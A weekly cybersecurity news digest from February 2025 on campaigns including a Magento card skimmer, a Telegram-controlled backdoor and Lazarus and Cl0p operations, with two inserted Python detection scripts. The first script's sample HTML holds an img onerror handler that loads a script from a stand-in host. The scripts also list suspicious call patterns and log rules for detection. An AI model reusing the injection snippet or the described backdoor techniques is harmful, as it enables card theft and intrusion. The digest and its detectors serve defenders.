19 February 2025

Weekly Summary Cyberattacks Feb 13-19

Cybersecurity researchers warn of new cyber-attack campaigns using fake software updates

Cybersecurity researchers have identified two new threat groups, TA2726 and TA2727, that distribute malware via compromised websites. These attackers use fake software update prompts to trick users into downloading malware onto their devices. One of the most worrying threats is FrigidStealer, a malware targeting macOS that steals personal information such as passwords and banking details. Depending on the user's operating system, the attacks can install other malware families instead, such as Lumma Stealer on Windows or Marcher on Android. Experts warn that these campaigns are difficult to detect because the attackers deliver the lure through legitimate, compromised sites. They recommend that users avoid downloading updates from anything other than official sources and that companies strengthen their security controls to counter these threats.

Hackers use image tags to steal credit card data in Magento   

A new malware campaign has been detected targeting online stores running Magento, hiding malicious code within image tags in the HTML to evade detection. This technique, linked to the MageCart group, allows the theft of payment information entered into checkout forms. The attack uses the onerror event-handler attribute on <img> tags to trigger JavaScript when an image fails to load, behaviour that browsers treat as legitimate. This lets the cybercriminals insert fake forms on payment pages, capture details such as card number, expiration date and CVV, and send them to external servers without the user noticing. Additionally, a similar method has been discovered in WordPress, where attackers use the "must-use plugins" folder to plant backdoors that execute automatically on every page load without appearing in the conventional plugins list. These findings highlight the evolving threats to e-commerce platforms.
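A defender-side check for the technique described above, added here as an example and not taken from the original report: it parses a page fragment and flags <img> tags that carry inline event handlers, rating an onerror body that loads scripts or decodes payloads as higher severity than a plain placeholder swap. The HTML sample is constructed for the example.

```python
import re
from html.parser import HTMLParser

# Constructed checkout-page fragment: a benign image, an image whose onerror
# handler injects a remote script (the pattern described above), and a
# harmless onerror that only swaps in a placeholder image.
SAMPLE_HTML = """
<html><body>
<img src="/media/logo.png" alt="logo">
<img src="https://cdn.example/missing.gif" onerror="var s=document.createElement('script');s.src='https://cdn.example/x.js';document.head.appendChild(s)">
<img src="/media/product.jpg" onerror="this.src='/media/placeholder.jpg'">
</body></html>
"""

# Handler bodies that build script elements, evaluate strings, decode blobs or
# call out to the network are the ones worth escalating on a payment page.
SUSPICIOUS = re.compile(
    r"createElement\(\s*['\"]script|eval\(|atob\(|fetch\(|XMLHttpRequest|document\.write",
    re.I,
)


class ImgHandlerScanner(HTMLParser):
    """Collect every <img> tag that carries an inline on* event-handler attribute."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        attrs = dict(attrs)  # html.parser lower-cases attribute names for us
        for name, value in attrs.items():
            if name.startswith("on") and value:
                self.findings.append({
                    "src": attrs.get("src", ""),
                    "handler": name,
                    "code": value,
                    "severity": "high" if SUSPICIOUS.search(value) else "low",
                })


def scan_html(html: str):
    """Return the list of inline-handler findings for one HTML document."""
    parser = ImgHandlerScanner()
    parser.feed(html)
    return parser.findings
```

Obfuscated handlers will not match the keyword list, so treat any inline handler on a checkout page as a finding to review, and pair the scan with a Content-Security-Policy that disallows inline event handlers.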

New backdoor written in Golang uncovered using Telegram to evade detection   

Cybersecurity researchers have identified a new Golang-based backdoor that uses Telegram's Bot API as its command-and-control (C2) channel. The backdoor, which may be of Russian origin, is still in development but is already fully functional. On launch the malware checks whether it is running from the path "C:\Windows\Temp\svchost.exe"; if not, it copies itself to that location and relaunches from there. What sets it apart is its use of an open-source library to interact with Telegram and receive commands from a chat controlled by the attackers. The commands implemented so far are "/cmd" to execute commands via PowerShell, "/persist" to persist on the system, and "/selfdestruct" to delete itself. Although the "/screenshot" command is not yet operational, it replies with a message falsely indicating that the capture was taken. The Russian origin is suggested because the "/cmd" command requests its instructions in Russian within the chat. Experts warn that the use of cloud applications such as Telegram makes the traffic hard to distinguish from legitimate use, which both hampers detection and simplifies deployment in attacks.
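Two detection rules a SOC could derive from the description above, written here as an added example rather than anything from the original report: Telegram Bot API requests from a process that is not a browser or chat client, and an svchost.exe running outside the Windows system directories. The log format, the allowlist and the event lines are all constructed assumptions; the bot token is a placeholder.

```python
import re
from typing import Dict, List

# Constructed endpoint network-event lines: "<time> <process path> -> <host><url path>".
SAMPLE_EVENTS = [
    "2025-02-14T10:01:02Z C:\\Program Files\\Mozilla Firefox\\firefox.exe -> api.telegram.org/bot<TOKEN>/getUpdates",
    "2025-02-14T10:01:05Z C:\\Windows\\System32\\svchost.exe -> ctldl.windowsupdate.com/msdownload/update",
    "2025-02-14T10:01:09Z C:\\Windows\\Temp\\svchost.exe -> api.telegram.org/bot<TOKEN>/getUpdates",
    "2025-02-14T10:01:12Z C:\\Windows\\Temp\\svchost.exe -> api.telegram.org/bot<TOKEN>/sendMessage",
]

EVENT_RE = re.compile(r"^(\S+) (.+?) -> ([^/\s]+)(/\S*)?$")
# Assumed allowlist of processes for which Bot API traffic is plausible; tune per estate.
ALLOWED_TELEGRAM_CLIENTS = {"firefox.exe", "chrome.exe", "msedge.exe", "telegram.exe"}
SYSTEM_DIRS = {"c:\\windows\\system32", "c:\\windows\\syswow64"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def dirname(path: str) -> str:
    return path.rsplit("\\", 1)[0].lower()


def analyse(line: str) -> Dict:
    """Apply both rules to one event line and return the triggered reasons."""
    m = EVENT_RE.match(line)
    if not m:
        return {"line": line, "reasons": ["unparsed"]}
    ts, proc, host, url = m.group(1), m.group(2), m.group(3).lower(), m.group(4) or ""
    reasons: List[str] = []
    # Rule 1: Bot API polling or sending (/bot<token>/<method>) from an unexpected process.
    if host == "api.telegram.org" and url.startswith("/bot") \
            and basename(proc) not in ALLOWED_TELEGRAM_CLIENTS:
        reasons.append("telegram-bot-api-from-unexpected-process")
    # Rule 2: svchost.exe masquerade outside System32/SysWOW64 (the Temp path described above).
    if basename(proc) == "svchost.exe" and dirname(proc) not in SYSTEM_DIRS:
        reasons.append("svchost-outside-system-dir")
    return {"time": ts, "process": proc, "host": host, "reasons": reasons}


def detect(lines: List[str]) -> List[Dict]:
    """Return only the events that triggered at least one rule."""
    return [r for r in map(analyse, lines) if r["reasons"]]
```

Rule 1 on its own will fire on legitimate Telegram bots run by staff, so the two rules carry most weight when they fire together on the same process, as they do for the Temp-path svchost.exe in the sample.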

Operation Marstech Mayhem: Lazarus targets cryptocurrency developers and wallets   

A recent report has revealed that the North Korean hacking group Lazarus has launched "Operation Marstech Mayhem", deploying a new malware called Marstech1. This advanced implant has been used since late 2024 in attacks targeting cryptocurrency developers and platforms. The malware operates through command-and-control servers with novel configurations and employs obfuscation techniques such as XOR encryption and Base85 encoding to evade detection. In addition, Lazarus has been publishing code to GitHub repositories, hiding the malware within seemingly legitimate projects. One of Marstech1's main objectives is the manipulation of browser extensions, especially cryptocurrency wallets such as MetaMask, along with harvesting data from wallets such as Exodus and Atomic. The malware collects system information and exfiltrates sensitive data to servers controlled by the attackers. This operation marks an evolution in Lazarus's tactics, setting it apart from previous campaigns such as Operation 99 and Phantom Circuit. The increasing sophistication of their techniques reinforces the need for tighter security measures across the software supply chain and development pipeline.

Cl0p ransomware hides in compromised networks after exfiltrating its victims' data   

The Cl0p ransomware group has refined its tactics to remain hidden in compromised networks after exfiltrating sensitive data. Known for its double-extortion strategy, the group not only encrypts files but also threatens to leak stolen information to pressure its victims. Recent attacks have shown that, after extracting critical data, Cl0p operators remove traces of their activity while keeping a foothold on the attacked systems, which enables follow-on operations. Their campaigns have exploited vulnerabilities in platforms such as Cleo Harmony and MOVEit Transfer, affecting millions of assets globally. For initial access, Cl0p uses phishing emails and exploits security flaws. Once inside, it employs tools such as Cobalt Strike for information theft together with evasion techniques including log deletion and manipulation of legitimate processes. In some cases the group has chosen to extract data without encrypting it at all, demonstrating its ability to adapt. Manufacturing, retail and transportation have been the most affected sectors, with the U.S. accounting for 72% of recent victims.